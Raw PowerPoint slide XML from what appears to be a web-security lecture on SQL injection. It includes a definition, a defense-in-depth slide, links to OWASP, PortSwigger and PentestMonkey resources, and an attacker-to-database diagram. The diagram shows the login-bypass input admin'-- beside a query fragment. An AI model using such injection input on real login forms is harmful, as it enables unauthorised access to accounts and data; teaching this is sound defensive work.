                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="94237" y="276368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94237" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129577" y="299928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141356" y="276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6319503" y="7863216"/>
            <a:ext cx="1264045" cy="1261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625732" y="7820494"/>
            <a:ext cx="1490216" cy="14927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510879" y="2909942"/>
            <a:ext cx="141605" cy="4183379"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="141605" h="4183379">
                <a:moveTo>
                  <a:pt x="47118" y="4041929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="4041929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70678" y="4183286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129577" y="4065488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47118" y="4065488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47118" y="4041929"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="141605" h="4183379">
                <a:moveTo>
                  <a:pt x="94237" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="47118" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47118" y="4065488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94237" y="4065488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94237" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="141605" h="4183379">
                <a:moveTo>
                  <a:pt x="141356" y="4041929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="94237" y="4041929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94237" y="4065488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129577" y="4065488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141356" y="4041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946020" y="4455436"/>
            <a:ext cx="1266825" cy="13779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14"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2950" spc="-270">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2950" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2950" spc="10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2950" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2950" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2950" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2950" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2950" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in   </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2950" spc="-100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Depth</a:t>
            </a:r>
            <a:endParaRPr sz="29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459041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35"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-345"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-90"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-445"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-540"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-360"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-9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44752" y="2300946"/>
            <a:ext cx="13922375" cy="658749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1225"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-285">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Academy </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="595959"/>
              </a:buClr>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="heavy" sz="2600" spc="5" i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https://portswigger.net/web-security/sql-injection</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Carlito"/>
              <a:cs typeface="Carlito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="389255" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-270">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hacker’s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-345">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Handbook</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-37719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1143000" algn="l"/>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="10" i="1">
                <a:latin typeface="Carlito"/>
                <a:cs typeface="Carlito"/>
              </a:rPr>
              <a:t>Chapter </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="15" i="1">
                <a:latin typeface="Carlito"/>
                <a:cs typeface="Carlito"/>
              </a:rPr>
              <a:t>9 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="10" i="1">
                <a:latin typeface="Carlito"/>
                <a:cs typeface="Carlito"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" i="1">
                <a:latin typeface="Carlito"/>
                <a:cs typeface="Carlito"/>
              </a:rPr>
              <a:t>Attacking </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="10" i="1">
                <a:latin typeface="Carlito"/>
                <a:cs typeface="Carlito"/>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="5" i="1">
                <a:latin typeface="Carlito"/>
                <a:cs typeface="Carlito"/>
              </a:rPr>
              <a:t>Stores</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Carlito"/>
              <a:cs typeface="Carlito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="389255" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="969"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-610">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-530">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="695"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="595959"/>
              </a:buClr>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="heavy" sz="2600" spc="10" i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https://owasp.org/www-community/attacks/SQL_Injection</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Carlito"/>
              <a:cs typeface="Carlito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="389255" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-610">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-165">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Prevention </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cheat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-755">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sheet</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="695"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="595959"/>
              </a:buClr>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="heavy" sz="2600" spc="10" i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https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Carlito"/>
              <a:cs typeface="Carlito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="389255" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PentestMonkey </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1143000" indent="-37719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Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1143635" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" u="heavy" sz="2600" i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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://pentestmonkey.net/category/cheat-sheet/sql-injection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593153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70"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-680"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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4752" y="2931714"/>
            <a:ext cx="15716250" cy="135763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89255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="755"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-110">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerability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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that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-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>consists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>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>attacker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-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interfering</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>with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45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the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-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>queries </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-320">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>makes </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-880">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="4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9842" y="6183675"/>
            <a:ext cx="2529566" cy="252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982759" y="6134263"/>
            <a:ext cx="2900016" cy="2902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98386" y="4930395"/>
            <a:ext cx="9380855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54520" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-270" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Attacker	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-170" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-365" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-250" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Server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4497" y="4937934"/>
            <a:ext cx="1975485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-114" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-130" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-240" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-130" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-280" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>e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07264" y="6861131"/>
            <a:ext cx="3940175" cy="188595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3751278" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3751278" y="188475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876929" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782691" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782691" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876929" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751278" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3751278" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751278" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751278" y="62825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3876929" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3782691" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782691" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876929" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939754" y="94237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876929" y="62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17990" y="5904607"/>
            <a:ext cx="1502410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185">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="580">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>--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82256" y="6861131"/>
            <a:ext cx="3940175" cy="188595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3751299" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3751299" y="188475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876950" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782712" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782712" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876950" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751299" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3751299" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751299" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751299" y="62825"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3940175" h="188595">
                <a:moveTo>
                  <a:pt x="3876950" y="62825"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3782712" y="62825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3782712" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876950" y="125650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3939775" y="94237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3876950" y="62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068502" y="4879298"/>
            <a:ext cx="3533140" cy="12344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  <a:tabLst>
                <a:tab pos="1120140" algn="l"/>
                <a:tab pos="1304290" algn="l"/>
                <a:tab pos="1673860" algn="l"/>
                <a:tab pos="2596515" algn="l"/>
                <a:tab pos="2781300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="434">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="434">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>users  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2600" spc="30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>where	</a:t>
